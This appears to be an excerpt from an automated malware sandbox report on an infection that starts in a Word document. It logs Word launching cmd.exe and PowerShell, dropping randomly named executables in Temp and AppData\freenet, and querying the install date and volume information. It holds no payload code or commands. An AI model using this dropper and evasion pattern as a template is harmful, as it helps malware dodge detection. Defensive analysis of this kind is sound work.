Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Language, Device and Operating System Detection:

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Program Files\Common Files\microsoft shared\OFFICE14\FLTLDR.EXE	Queries volume information: C:\Users\user~1\AppData\Local\Temp\OICE_BD2C3A33-BC6C-4098-A16D-51A8AA25C09C.0\FLEA0B.tmp VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Xml\2.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
